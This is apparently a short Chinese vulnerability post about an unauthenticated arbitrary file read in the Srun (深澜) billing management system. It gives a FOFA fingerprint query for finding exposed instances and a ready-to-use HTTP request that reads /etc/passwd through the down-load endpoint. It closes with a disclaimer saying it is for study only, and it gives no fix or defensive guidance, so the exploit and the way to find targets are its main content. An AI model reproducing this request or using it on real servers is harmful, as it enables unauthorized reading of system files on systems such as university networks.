0x01 产品简介

深澜计费管理系统是一套完善的、领先的具有复杂生物型特征的弹性认证计费系统。其主要由以下几个模块组成：AAA认证计费平台、系统运营维护管理平台、用户及策略管理平台、用户自助服务平台、智能客户端模块、消息推送模块以及数据统计模块。该系统为全球超过2500家客户提供服务，其中包括中国Top100高校中的60%选用本产品。

0x02 漏洞概述

深澜计费管理系统存在任意文件读取漏洞，未授权的攻击者可以通过该漏洞读取服务器任意文件。

0x03 测绘语句

fofa：icon_hash="-1546320596"

0x04 漏洞复现

GET /user/group/down-load?file=/etc/passwd HTTP/1.1

0x05 影响范围

深澜计费管理系统

0x06 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。